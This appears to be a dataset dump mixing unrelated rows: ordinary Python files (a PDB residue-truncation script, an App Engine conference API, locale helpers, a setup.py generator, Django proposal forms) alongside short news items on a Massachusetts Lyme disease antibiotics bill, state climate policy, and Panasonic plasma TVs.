text
stringlengths 29
850k
|
|---|
#! /usr/bin/python
"""Strip the first and last residue of every chain from a PDB file.

Usage: script.py input.pdb  ->  writes input_trunc.pdb

Fixes over the original flat script: the whole body ran at import time
(no __main__ guard), and every ATOM line was matched against parallel
min/max lists via a manually maintained index ``k`` with an always-true
``elif`` — replaced by a per-chain lookup table.
"""
import sys


def chain_residues(path):
    """Map chain ID -> list of residue-number strings found on ATOM records.

    NOTE(review): the chain ID is read from column 22 (index 21) per the
    PDB format, but the residue number is read from [23:26] while the
    standard resSeq field spans [22:26]; 4-digit residue numbers would be
    misread. Preserved as-is — TODO confirm against the expected inputs.
    """
    chains = {}
    with open(path, "r") as handle:
        for line in handle:
            if "ATOM" in line:
                chains.setdefault(line[21], []).append(line[23:26].strip())
    return chains


def truncate_pdb(in_path, out_path):
    """Copy *in_path* to *out_path*, dropping each chain's terminal residues.

    An ATOM record is dropped when its residue number equals the numeric
    minimum or maximum residue number of its chain; all other records are
    copied unchanged.
    """
    chains = chain_residues(in_path)
    # Numeric min/max per chain (residue numbers are kept as strings).
    extremes = {
        chain: {min(residues, key=int), max(residues, key=int)}
        for chain, residues in chains.items()
    }
    with open(in_path, "r") as src, open(out_path, "w") as dst:
        for line in src:
            if "ATOM" in line and line[23:26].strip() in extremes.get(line[21], ()):
                continue  # terminal residue of its chain: skip it
            dst.write(line)


def main():
    """Entry point: derive the output name from argv[1] and truncate."""
    in_path = sys.argv[1]
    out_path = in_path[: in_path.find(".pdb")] + "_trunc.pdb"
    truncate_pdb(in_path, out_path)


if __name__ == "__main__":
    main()
|
$37.71 $39.95 Save 6% Current price is $37.71, Original price is $39.95. You Save 6%.
Over 200 examples of successful graphic design, with production specs, using fewer colors and spending fewer dollars.
|
#!/usr/bin/env python
"""
conference.py -- Udacity conference server-side Python App Engine API;
uses Google Cloud Endpoints
$Id: conference.py,v 1.25 2014/05/24 23:42:19 wesc Exp wesc $
created by wesc on 2014 apr 21
"""
__author__ = 'wesc+api@google.com (Wesley Chun)'
from datetime import datetime
import endpoints
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from google.appengine.api import memcache
from google.appengine.ext import ndb
from models import Profile
from models import ProfileMiniForm
from models import ProfileForm
from models import StringMessage
from models import BooleanMessage
from models import Conference
from models import ConferenceForm
from models import ConferenceForms
from models import ConferenceQueryForms
from models import Session
from models import SessionForm
from models import SessionForms
from models import SessionQueryForm
from models import SessionQueryForms
from models import Speaker
from settings import WEB_CLIENT_ID
from settings import ANDROID_CLIENT_ID
from settings import IOS_CLIENT_ID
from settings import ANDROID_AUDIENCE
from utils import getUserId
import process.conferences
import process.sessions
import process.profiles
from process.speakers import MEMCACHE_FEATURED_SPEAKER_KEY
from process.announcements import MEMCACHE_ANNOUNCEMENTS_KEY
# OAuth scope / API-explorer client shortcuts re-exported from endpoints.
EMAIL_SCOPE = endpoints.EMAIL_SCOPE
API_EXPLORER_CLIENT_ID = endpoints.API_EXPLORER_CLIENT_ID

# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# ResourceContainers combine a request message class with URL path/query
# parameters for the endpoints methods below.

# GET/DELETE on a single conference, addressed by its websafe key.
CONF_GET_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    websafeConferenceKey=messages.StringField(1),
)
# Update payload (ConferenceForm) plus the target conference key.
CONF_POST_REQUEST = endpoints.ResourceContainer(
    ConferenceForm,
    websafeConferenceKey=messages.StringField(1),
)
# Session creation payload plus its parent conference key.
SESSION_POST_REQUEST = endpoints.ResourceContainer(
    SessionForm,
    websafeConferenceKey=messages.StringField(1)
)
# Filter a conference's sessions by session type.
SESSION_QUERY_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    websafeConferenceKey=messages.StringField(1),
    typeOfSession=messages.StringField(2)
)
# Look up sessions by speaker name.
SESSION_SPEAKER_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    speaker=messages.StringField(1)
)
# Address a single session by its websafe key (wishlist operations).
SESSION_GET_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    websafeSessionKey=messages.StringField(1)
)
# Filter sessions by calendar date (string, parsed as %Y-%m-%d).
SESSION_DATE_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    date=messages.StringField(1)
)
# Filter sessions whose duration lies within [min_duration, max_duration].
SESSION_DURATION_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    min_duration=messages.IntegerField(1),
    max_duration=messages.IntegerField(2)
)
# Combined filter: exclude session types, bound the start hour window.
SESSION_FILTER_REQUEST = endpoints.ResourceContainer(
    message_types.VoidMessage,
    not_type=messages.StringField(1, repeated=True),
    start_hour=messages.IntegerField(2),
    end_hour=messages.IntegerField(3)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.api(name='conference', version='v1', audiences=[ANDROID_AUDIENCE],
               allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID,
                                   ANDROID_CLIENT_ID, IOS_CLIENT_ID],
               scopes=[EMAIL_SCOPE])
class ConferenceApi(remote.Service):
    """Conference API v0.1

    Thin endpoint layer: request validation and datastore lookups happen
    here; the heavy lifting is delegated to the process.* modules.
    """

    # - - - Conference objects - - - - - - - - - - - - - - - - -

    @endpoints.method(ConferenceForm, ConferenceForm, path='conference',
                      http_method='POST', name='createConference')
    def createConference(self, request):
        """Create new conference."""
        return process.conferences.createConferenceObject(request)

    @endpoints.method(CONF_POST_REQUEST, ConferenceForm,
                      path='conference/{websafeConferenceKey}',
                      http_method='PUT', name='updateConference')
    def updateConference(self, request):
        """Update conference w/provided fields & return w/updated info."""
        return process.conferences.updateConferenceObject(request)

    @endpoints.method(CONF_GET_REQUEST, ConferenceForm,
                      path='conference/{websafeConferenceKey}',
                      http_method='GET', name='getConference')
    def getConference(self, request):
        """Return requested conference (by websafeConferenceKey)."""
        # get Conference object from request; bail if not found
        conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()
        if not conf:
            raise endpoints.NotFoundException((
                'No conference found with key: %s'
            ) % request.websafeConferenceKey)
        # the organiser's Profile is the conference's datastore parent
        prof = conf.key.parent().get()
        # return ConferenceForm
        return process.conferences.copyConferenceToForm(
            conf, getattr(prof, 'displayName')
        )

    @endpoints.method(message_types.VoidMessage, ConferenceForms,
                      path='getConferencesCreated',
                      http_method='POST', name='getConferencesCreated')
    def getConferencesCreated(self, request):
        """Return conferences created by user."""
        # make sure user is authed
        user = endpoints.get_current_user()
        if not user:
            raise endpoints.UnauthorizedException('Authorization required')
        user_id = getUserId(user)
        # create ancestor query for all key matches for this user
        confs = Conference.query(ancestor=ndb.Key(Profile, user_id))
        prof = ndb.Key(Profile, user_id).get()
        # return set of ConferenceForm objects per Conference
        return ConferenceForms(
            items=[
                process.conferences.copyConferenceToForm(
                    conf, getattr(prof, 'displayName')
                ) for conf in confs
            ]
        )

    @endpoints.method(ConferenceQueryForms, ConferenceForms,
                      path='queryConferences',
                      http_method='POST',
                      name='queryConferences')
    def queryConferences(self, request):
        """Query for conferences."""
        conferences = process.conferences.getQuery(request)
        # need to fetch organiser displayName from profiles
        # get all keys and use get_multi for speed
        organizers = [
            (ndb.Key(Profile, conf.organizerUserId)) for conf in conferences
        ]
        profiles = ndb.get_multi(organizers)
        # put display names in a dict for easier fetching
        names = {}
        for profile in profiles:
            names[profile.key.id()] = profile.displayName
        # return individual ConferenceForm object per Conference
        return ConferenceForms(
            items=[
                process.conferences.copyConferenceToForm(
                    conf, names[conf.organizerUserId]
                ) for conf in conferences
            ]
        )

    # - - - Session objects - - - - - - - - - - - - - - - - - - -

    @endpoints.method(SESSION_POST_REQUEST, SessionForm,
                      path='conference/{websafeConferenceKey}/createSession',
                      http_method='POST', name='createSession')
    def createSession(self, request):
        """Create a new session in selected conference."""
        return process.sessions.createSessionObject(request)

    @endpoints.method(CONF_GET_REQUEST, SessionForms,
                      path='conference/{websafeConferenceKey}/sessions',
                      http_method='GET', name='getConferenceSessions')
    def getConferenceSessions(self, request):
        """List all the sessions on the selected conference."""
        c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
        if not c_key.get():
            raise endpoints.NotFoundException(
                (
                    'No conference found with key: %s'
                ) % request.websafeConferenceKey
            )
        sessions = Session.query(ancestor=c_key)
        sessions = sessions.order(Session.startTime)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    @endpoints.method(
        SESSION_QUERY_REQUEST, SessionForms,
        path='conference/{websafeConferenceKey}/sessions/{typeOfSession}',
        http_method='GET', name='getConferenceSessionsByType'
    )
    def getConferenceSessionsByType(self, request):
        """List all the sessions of the selected Type."""
        c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
        if not c_key.get():
            raise endpoints.NotFoundException(
                (
                    'No conference found with key: %s'
                ) % request.websafeConferenceKey
            )
        sessions = Session.query(ancestor=c_key)
        sessions = sessions.filter(
            Session.typeOfSession == request.typeOfSession
        )
        sessions = sessions.order(Session.startTime)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    # NOTE(review): the published endpoint name 'getConferenceBySpeaker'
    # does not match the method name; kept as-is since clients address the
    # published name.
    @endpoints.method(SESSION_SPEAKER_REQUEST, SessionForms,
                      path='conference/sessions/speaker/{speaker}',
                      http_method='GET', name='getConferenceBySpeaker')
    def getSessionsBySpeaker(self, request):
        """List of the sessions by the selected Speaker."""
        speaker = Speaker.query(Speaker.name == request.speaker).get()
        if not speaker:
            raise endpoints.NotFoundException(
                'Speaker %s is not registered' % request.speaker
            )
        sessions = Session.query(Session.speakerId == speaker.key.urlsafe())
        sessions = sessions.order(Session.startTime)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    @endpoints.method(SESSION_DATE_REQUEST, SessionForms,
                      path='conference/sessions/date',
                      http_method='GET', name='getSessionsByDate')
    def getSessionsByDate(self, request):
        """List of sessions on the selected date."""
        sessions = Session.query()
        sessions = sessions.filter(
            Session.date == datetime.strptime(
                request.date[:10], "%Y-%m-%d"
            ).date()
        )
        # FIX: ndb queries are immutable -- the result of .order() was
        # previously discarded, so sessions came back unordered. Assign it,
        # matching every other session endpoint in this class.
        sessions = sessions.order(Session.startTime)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    @endpoints.method(SESSION_DURATION_REQUEST, SessionForms,
                      path='conference/sessions/duration',
                      http_method='GET', name='getSessionsByDuration')
    def getSessionsByDuration(self, request):
        """List of sessions within the specified duration."""
        sessions = Session.query()
        sessions = sessions.filter(
            Session.duration >= request.min_duration
        )
        sessions = sessions.filter(
            Session.duration <= request.max_duration
        )
        sessions = sessions.order(Session.duration)
        sessions = sessions.order(Session.startTime)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    @endpoints.method(SESSION_FILTER_REQUEST, SessionForms,
                      path='conference/sessions/filter',
                      http_method='GET', name='filterSessions')
    def queryProblem(self, request):
        """Filter sessions by time of the day and type of session."""
        sessions = Session.query()
        sessions = sessions.filter(Session.startTime >= request.start_hour)
        sessions = sessions.filter(Session.startTime <= request.end_hour)
        sessions = sessions.order(Session.startTime)
        # The type exclusion cannot be expressed as a single datastore
        # inequality filter alongside startTime, so filter in memory.
        items = []
        for sess in sessions:
            if sess.typeOfSession not in request.not_type:
                items.append(process.sessions.copySessionToForm(sess))
        return SessionForms(
            items=items
        )

    @endpoints.method(SessionQueryForms, SessionForms,
                      path='conference/sessions/query',
                      http_method='GET', name='querySessions')
    def querySessions(self, request):
        """Query sessions with user provided filters"""
        sessions = process.sessions.getQuery(request)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    # - - - Featured Speaker - - - - - - - - - - - - - - - - - - -

    @endpoints.method(message_types.VoidMessage, StringMessage,
                      path='conference/featured_speaker/get',
                      http_method='GET', name='getFeaturedSpeaker')
    def getFeaturedSpeaker(self, request):
        """Return Featured Speaker from memcache."""
        # Empty string when no featured speaker has been cached yet.
        return StringMessage(
            data=memcache.get(MEMCACHE_FEATURED_SPEAKER_KEY) or ""
        )

    # - - - Wishlist - - - - - - - - - - - - - - - - - - - - - - -

    @endpoints.method(SESSION_GET_REQUEST, BooleanMessage,
                      path='addSessionToWishlist/{websafeSessionKey}',
                      http_method='POST', name='addSessionToWishlist')
    def addSessionToWishlist(self, request):
        """Add a session to user Wishlist."""
        prof = process.profiles.getProfileFromUser()
        session = ndb.Key(urlsafe=request.websafeSessionKey).get()
        if not session:
            raise endpoints.NotFoundException(
                'Session Not Found'
            )
        # A websafe key can decode to any entity kind; reject non-sessions.
        if not isinstance(session, Session):
            raise endpoints.BadRequestException(
                'Element provided is not a Session'
            )
        prof.sessionsWishlist.append(request.websafeSessionKey)
        prof.put()
        return BooleanMessage(data=True)

    @endpoints.method(message_types.VoidMessage, SessionForms,
                      path='wishlist', http_method='GET',
                      name='getSessionsWishlist')
    def getSessionsInWishlist(self, request):
        """List sessions saved on user Wishlist."""
        prof = process.profiles.getProfileFromUser()
        sess_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.sessionsWishlist]
        sessions = ndb.get_multi(sess_keys)
        return SessionForms(
            items=[
                process.sessions.copySessionToForm(sess) for sess in sessions
            ]
        )

    # - - - Profile objects - - - - - - - - - - - - - - - - - - -

    @endpoints.method(message_types.VoidMessage, ProfileForm,
                      path='profile', http_method='GET', name='getProfile')
    def getProfile(self, request):
        """Return user profile."""
        return process.profiles.doProfile()

    @endpoints.method(ProfileMiniForm, ProfileForm,
                      path='profile', http_method='POST', name='saveProfile')
    def saveProfile(self, request):
        """Update & return user profile."""
        return process.profiles.doProfile(request)

    # - - - Announcements - - - - - - - - - - - - - - - - - - - -

    @endpoints.method(message_types.VoidMessage, StringMessage,
                      path='conference/announcement/get',
                      http_method='GET', name='getAnnouncement')
    def getAnnouncement(self, request):
        """Return Announcement from memcache."""
        return StringMessage(
            data=memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY) or ""
        )

    # - - - Registration - - - - - - - - - - - - - - - - - - - -

    @endpoints.method(message_types.VoidMessage, ConferenceForms,
                      path='conferences/attending',
                      http_method='GET', name='getConferencesToAttend')
    def getConferencesToAttend(self, request):
        """Get list of conferences that user has registered for."""
        prof = process.profiles.getProfileFromUser()  # get user Profile
        conf_keys = [
            ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend
        ]
        conferences = ndb.get_multi(conf_keys)
        # get organizers
        organisers = [
            ndb.Key(Profile, conf.organizerUserId) for conf in conferences
        ]
        profiles = ndb.get_multi(organisers)
        # put display names in a dict for easier fetching
        names = {}
        for profile in profiles:
            names[profile.key.id()] = profile.displayName
        # return set of ConferenceForm objects per Conference
        return ConferenceForms(
            items=[process.conferences.copyConferenceToForm(
                conf, names[conf.organizerUserId]
            ) for conf in conferences]
        )

    @endpoints.method(CONF_GET_REQUEST, BooleanMessage,
                      path='conference/{websafeConferenceKey}',
                      http_method='POST', name='registerForConference')
    def registerForConference(self, request):
        """Register user for selected conference."""
        return process.conferences.conferenceRegistration(request)

    @endpoints.method(CONF_GET_REQUEST, BooleanMessage,
                      path='conference/{websafeConferenceKey}',
                      http_method='DELETE', name='unregisterFromConference')
    def unregisterFromConference(self, request):
        """Unregister user for selected conference."""
        return process.conferences.conferenceRegistration(request, reg=False)

    @endpoints.method(message_types.VoidMessage, ConferenceForms,
                      path='filterPlayground',
                      http_method='GET', name='filterPlayground')
    def filterPlayground(self, request):
        """Filter Playground"""
        q = Conference.query()
        # field = "city"
        # operator = "="
        # value = "London"
        # f = ndb.query.FilterNode(field, operator, value)
        # q = q.filter(f)
        q = q.filter(Conference.city == "London")
        q = q.filter(Conference.topics == "Medical Innovations")
        q = q.filter(Conference.month == 6)
        return ConferenceForms(
            items=[
                process.conferences.copyConferenceToForm(conf,
                                                         "") for conf in q
            ]
        )
api = endpoints.api_server([ConferenceApi]) # register API
|
A law allowing the long-term use of antibiotics for the treatment of chronic Lyme disease has been approved by the Legislature and is awaiting Gov. Deval L. Patrick's signature.
Currently, doctors in Massachusetts are prohibited from prescribing antibiotics to patients with the disease for longer than four weeks, because of complications associated with using antibiotics over a prolonged period of time, and controversy about the existence of a chronic form of Lyme disease, which is caused by a bacterium transmitted by deer ticks.
State Sen. Stephen M. Brewer, D-Barre, a sponsor of the bill, said the antibiotic provision is attached to the state budget for next fiscal year, although no funding is involved.
Mr. Brewer said as it stands now, doctors cannot treat patients based on their judgment, and must send patients out of state to get long-term antibiotics. A similar law, allowing long-term use, was passed in New Hampshire in February. Several other states already allow long-term treatment, he said.
Hundreds of cases of the disease, many in children, are reported annually in Massachusetts — in all areas of the state.
According to information from the state Department of Public Health, prompt antibiotic treatment during the early stage of the disease prevents serious problems later on. The initial sign, which occurs days or weeks after a bite from an infected tick, is a doughnut-like rash appearing where the tick was attached. Flu-like symptoms such as fever, headache, stiff neck, aches and fatigue may also be present.
About 60 percent of those with untreated Lyme disease develop arthritis in the knees, elbows and wrists, which is often chronic. Other long-term effects of untreated Lyme disease include nervous system problems such as meningitis, facial weakness (Bell's palsy), and weakness in the arms, legs, hands, and feet. Those symptoms can develop months or years after the initial infection.
Usually, Lyme disease can be successfully treated with four weeks of antibiotics.
According to the U.S. Centers for Disease Control and Prevention, antibiotic treatment above and beyond one repeat, four-week round has not been shown to be beneficial and has been linked to serious complications, such as allergic reactions to antibiotics.
There is a divide among health care professionals on how to treat Lyme disease that persists beyond a second round of antibiotics. CDC literature says much of the controversy revolves around whether symptoms reflect continued infection after treatment, and if the Lyme disease bacterium, Borrelia burgdorferi, can even exist in a chronic state following initial antibiotic treatment.
Mr. Brewer, who was horrified when he learned of the long-term consequences of untreated Lyme disease after watching a 90-minute video on the topic given to him by constituents, contends that treatment should be left up to a patient's doctor.
"It's a devastating, life-changing, debilitating long-term illness," he said Monday, pointing out that the Association of American Physicians has endorsed the proposed law.
|
# -*- coding: utf-8 -*-
"""
lang.py: Locale constants
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
from __future__ import unicode_literals
from bottle_utils.i18n import lazy_gettext as _
from ..core.contrib.i18n.consts import LOCALES, LANGS
from ..core.contrib.templates.decorators import template_helper
# All known languages preceded by an "any language" catch-all entry.
SELECT_LANGS = [('', _('any language'))] + LANGS
# Codes of right-to-left languages (includes legacy aliases ji/iw).
RTL_LANGS = ['ar', 'he', 'ur', 'yi', 'ji', 'iw', 'fa']
def lang_name(code):
    """Return native language name for locale code.

    Raises KeyError when *code* is not present in LOCALES.
    """
    return LOCALES[code]
@template_helper()
def lang_name_safe(code):
    """Return the native language name for *code*, or a translated
    'unknown' placeholder when the code is not recognised."""
    try:
        name = lang_name(code)
    except KeyError:
        name = _('unknown')
    return name
@template_helper()
def is_rtl(code):
    """Return True when *code* denotes a right-to-left language."""
    return code in RTL_LANGS
@template_helper()
def dir(code):
    """Return the HTML text-direction value for *code*: 'rtl' or 'auto'.

    NOTE(review): this shadows the builtin ``dir`` at module level; renaming
    would change the template-helper name, so it is kept as-is.
    """
    return 'rtl' if code in RTL_LANGS else 'auto'
@template_helper()
def i18n_attrs(lang):
    """Build the i18n HTML attribute string for *lang*.

    Returns '' for a falsy *lang*; otherwise ' lang="xx"' plus
    ' dir="rtl"' for right-to-left languages.
    """
    if not lang:
        return ''
    # XXX: Do we want to keep the leading space?
    attrs = ' lang="%s"' % lang
    if template_helper.is_rtl(lang):
        attrs += ' dir="rtl"'
    return attrs
|
As E&E reported last night, the Attorneys General of Massachusetts, Delaware, Maine, Maryland, Rhode Island, Vermont and California sent a letter this week to Senators Kerry, Graham and Lieberman in which they urge the Senators to incorporate provisions in the climate bill expected to be announced later this month, which save existing state initiatives. Drawing a parallel to California’s emissions standards waiver under the Clean Air Act, they urge coexisting federal and State authority to spur energy independence and reduce global warming pollution.
Some suggestions make a lot of sense for both regulators and the regulated community: allowing time for industries participating in regional programs to transition to federal programs, providing for an exchange of RGGI allowances, and maintaining EPA’s authority under the Clean Air Act to regulate in the absence of functional federal programs created by new legislation could all allow the transition between programs to flow more smoothly.
However, their call to keep cap-and-trade initiatives like RGGI viable in the midst of federal cap-and-trade, and at most impose only a temporary moratorium for a fixed period of time, seems more like a land grab than good policy. The AGs say it would provide a valuable incentive to ensure rigorous implementation and enforcement of the federal program. No. Overlapping cap-and-trade programs would only create a mess. A nationwide and comprehensive cap-and-trade program is clearly preferable, for both the economy and achieving reductions in carbon dioxide emissions.
|
import os
import re
import json
import argparse
import pip
import copy
from collections import OrderedDict
from setuptools import find_packages
# Package name derived from the working directory (spaces -> dashes).
BASE_FOLDER = os.path.basename(os.path.abspath('.')).replace(' ', '-').lower()
EXCLUDE_FOLDERS = ['contrib', 'docs', 'tests*']
# FIX: regex patterns are now raw strings; '\_' in a normal string literal
# is an invalid escape sequence (DeprecationWarning, SyntaxError in newer
# Python versions).
TEXT_FILES = r'([A-Za-z]+)(\_[A-Za-z]+)*\.(rst|md)$'
# Template for the generated setup.py; {args} receives the keyword block.
SETUPPY = 'from setuptools import setup\nsetup(\n{args}\n)\n'
# Validates "name=package.module:function" console-script entries.
CONSOLE_SCRIPT = r'^([A-Za-z]+)(\_([A-Za-z]+))*\=([A-Za-z]+(\_[A-Za-z]+)*)(\.[A-Za-z]+(\_[A-Za-z]+)*)*\:([A-Za-z]+)(\_([A-Za-z]+))*$'
# NOTE(review): reads classifiers.txt at import time and fails if absent --
# presumably shipped alongside this script; confirm.
CLASSIFIERS = ''.join(open('classifiers.txt')).split('\n')
class ConsoleScripts(OrderedDict):
    """Ordered mapping of console-script names to 'module:function' paths.

    FIX: the original ``def add(self)`` was a SyntaxError (no colon, no
    body), which prevented the whole module from importing. The stub is
    completed with the minimally useful behavior; no callers could have
    existed while the file failed to parse.
    """

    def add(self, name, module):
        """Register console script *name* pointing at *module*."""
        self[name] = module
class Setup(OrderedDict):
    """setup.json loaded as an ordered mapping; empty when the file is absent."""

    def __init__(self, fname='setup.json'):
        # FIX: remember the backing file -- save() reads self.file, but the
        # original never assigned it, so save() raised AttributeError.
        self.file = fname
        try:
            with open(fname) as f:
                setup = json.load(f, object_pairs_hook=OrderedDict)
        except IOError:
            # Missing file: start from an empty configuration.
            setup = OrderedDict()
        super(Setup, self).__init__(setup)

    def __str__(self):
        """JSON representation, preserving key order."""
        return json.dumps(self, indent=4)

    def save(self):
        """Write the current configuration back to the backing JSON file."""
        with open(self.file, 'w') as f:
            f.write(str(self))
class Setup2(OrderedDict):
    """setup.json as an ordered mapping, with setup.py generation."""

    def __init__(self):
        self.file = 'setup.json'
        try:
            with open(self.file) as f:
                setup = json.load(f, object_pairs_hook=OrderedDict)
        except IOError:
            # Missing file: start from an empty configuration.
            setup = OrderedDict()
        # FIX: super() previously named the wrong class (Setup), which made
        # every instantiation raise TypeError.
        super(Setup2, self).__init__(setup)

    def __str__(self):  # debug only
        return json.dumps(self, indent=4)

    def save(self):
        """Write the configuration back to setup.json."""
        with open(self.file, 'w') as f:
            f.write(str(self))

    def add_console_scripts(self, name, module):
        """Register console script *name* -> *module*; return 1 if invalid."""
        if re.match(CONSOLE_SCRIPT, name + '=' + module):
            # FIX: build the nested dicts without clobbering existing data;
            # the original raised KeyError when 'entry_points' existed
            # without a 'console_scripts' sub-dict.
            scripts = self.setdefault('entry_points', {}).setdefault(
                'console_scripts', {}
            )
            scripts[name] = module
        else:
            return 1

    def gen(self):
        '''generates a new setup.py based on your setup.json'''
        setuppy = copy.deepcopy(self)
        # - Adjust console scripts: setup() expects "name=module" strings.
        # FIX: guard the lookup -- the original raised KeyError when no
        # console scripts had been registered.
        if 'entry_points' in setuppy and 'console_scripts' in setuppy['entry_points']:
            setuppy['entry_points']['console_scripts'] = [
                '{}={}'.format(name, module)
                for name, module in self['entry_points']['console_scripts'].items()
            ]
        setuppy = json.dumps(setuppy, indent=4)
        # - Adjust file based entries: inline the file's contents at runtime.
        for key in ['long_description']:
            # FIX: skip absent keys instead of raising KeyError.
            if key in self and re.match(TEXT_FILES, self[key]):
                setuppy = setuppy.replace(
                    '"' + self[key] + '"', '"".join(open("' + self[key] + '"))'
                )
        # - Replacing ":" for "=" so JSON keys become keyword arguments.
        for basekey in self.keys():
            setuppy = setuppy.replace('"' + basekey + '":', basekey + ' =')
        # Drop the surrounding JSON braces before templating.
        setuppy = setuppy[1:-1]
        with open('setup.py', 'w') as f:
            f.write(SETUPPY.format(args=setuppy))
|
Panasonic not only offers Viera LCD TVs, but also the DIGA Plasma TVs and there are 3 new models, the 50-inch TH-50PX80, 42-inch TH-42PX80 and the 37-inch TH-37PX80.
Panasonic DIGA TH-50PX80 offers a resolution of 1366×768 while the other 2 have a resolution of 1,024×768. The main feature of the 3 new Plasmas is the 15,000:1 contrast ratio. They offer 2 HDMI inputs, S-Video and D-Sub.
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pagedown.widgets import PagedownWidget
from junction.base.constants import (
ConferenceSettingConstants,
ProposalReviewerComment,
ProposalReviewStatus,
ProposalStatus,
ProposalTargetAudience,
ProposalVotesFilter,
)
from junction.proposals.models import (
ProposalSection,
ProposalSectionReviewerVoteValue,
ProposalType,
)
def _get_proposal_section_choices(conference, action="edit"):
    """Return (id, name) choice tuples for *conference*'s proposal sections.

    FIX: the original "create" and "edit" branches ran the byte-identical
    query, so the branching was dead code; collapsed to a single return.
    The *action* parameter is kept for interface compatibility (and in case
    create-time filtering is added later, mirroring
    _get_proposal_type_choices).
    """
    return [
        (str(cps.id), cps.name)
        for cps in ProposalSection.objects.filter(conferences=conference)
    ]
def _get_proposal_type_choices(conference, action="edit"):
    """Return (id, name) choice tuples for *conference*'s proposal types.

    For "create", only types whose submission window is still open
    (end_date in the future) are offered; editing shows every type.
    """
    if action == "create":
        queryset = ProposalType.objects.filter(
            conferences=conference, end_date__gt=now()
        )
    else:
        queryset = ProposalType.objects.filter(conferences=conference)
    return [(str(proposal_type.id), proposal_type.name) for proposal_type in queryset]
def _get_proposal_section_reviewer_vote_choices(conference):
    """Return (value, description) vote choices for reviewers.

    The zero ("+0") vote is omitted when the conference setting
    ALLOW_PLUS_ZERO_REVIEWER_VOTE is present and falsy; with no explicit
    setting, zero votes are allowed.
    """
    allow_plus_zero_vote = ConferenceSettingConstants.ALLOW_PLUS_ZERO_REVIEWER_VOTE
    setting = conference.conferencesetting_set.filter(
        name=allow_plus_zero_vote["name"]
    ).first()
    allow_zero = setting.value if setting else True
    choices = []
    for vote in ProposalSectionReviewerVoteValue.objects.all().reverse():
        if vote.vote_value == 0 and not allow_zero:
            continue
        choices.append((vote.vote_value, "{}".format(vote.description)))
    return choices
class HorizRadioRenderer(forms.RadioSelect.renderer):
    """
    This overrides widget method to put radio buttons horizontally instead of vertically.
    """
    # NOTE(review): forms.RadioSelect.renderer is an old-Django API (removed
    # in Django 1.11+) -- confirm the pinned Django version before reuse.

    def render(self):
        """Outputs radios"""
        # Join the individual radio widgets with newlines, bypassing the
        # default <ul>/<li> list markup.
        return mark_safe("\n".join(["%s\n" % w for w in self]))
class ProposalForm(forms.Form):
    """
    Used for create/edit
    """

    # -- Core proposal fields --------------------------------------------
    title = forms.CharField(
        min_length=10,
        help_text="Title of the Proposal",
        widget=forms.TextInput(attrs={"class": "charfield"}),
    )
    description = forms.CharField(
        widget=PagedownWidget(show_preview=True), help_text=("Describe your Proposal")
    )
    target_audience = forms.ChoiceField(
        label="Target Audience",
        choices=ProposalTargetAudience.CHOICES,
        widget=forms.Select(attrs={"class": "dropdown"}),
    )
    status = forms.ChoiceField(
        widget=forms.Select(attrs={"class": "dropdown"}),
        choices=ProposalStatus.CHOICES,
        help_text=(
            "If you choose DRAFT people can't see the session in the list."
            " Make the proposal PUBLIC when you're done editing."
        ),
    )
    # Choices for the next two fields are filled per-conference in __init__.
    proposal_type = forms.ChoiceField(
        label="Proposal Type", widget=forms.Select(attrs={"class": "dropdown"})
    )
    proposal_section = forms.ChoiceField(
        label="Proposal Section", widget=forms.Select(attrs={"class": "dropdown"})
    )
    # Additional Content
    prerequisites = forms.CharField(
        label="Pre-requisites",
        widget=PagedownWidget(show_preview=True),
        required=False,
        help_text="What should the participants know before attending your session?",
    )
    video_url = forms.CharField(
        label="Video URL",
        required=False,
        help_text="Short 1-2 min video describing your talk",
        widget=forms.TextInput(attrs={"class": "charfield"}),
    )
    content_urls = forms.CharField(
        label="Content URLs",
        widget=PagedownWidget(show_preview=True),
        required=False,
        help_text="Links to your session like GitHub repo, Blog, Slideshare etc ...",
    )
    private_content_urls = forms.BooleanField(
        help_text="Check the box if you want to make your content URLs private",
        label="Make the context URLs private",
        required=False,
    )
    speaker_info = forms.CharField(
        label="Speaker Information",
        widget=PagedownWidget(show_preview=True),
        required=False,
        help_text="Say something about yourself, work etc...",
    )
    is_first_time_speaker = forms.BooleanField(
        label="First Time Speaker",
        required=False,
        help_text="Please mark, if you are a first time speaker for any conference or meetup,"
        "not just for PyCon India",
    )
    speaker_links = forms.CharField(
        label="Speaker Links",
        widget=PagedownWidget(show_preview=True),
        required=False,
        help_text="Links to your previous work like Blog, Open Source Contributions etc ...",
    )

    def __init__(self, conference, action="edit", *args, **kwargs):
        """Populate section/type choices for *conference*.

        *action* ("create"/"edit") narrows the proposal-type choices to
        types still open for submission when creating.
        """
        super(ProposalForm, self).__init__(*args, **kwargs)
        self.fields["proposal_section"].choices = _get_proposal_section_choices(
            conference, action=action
        )
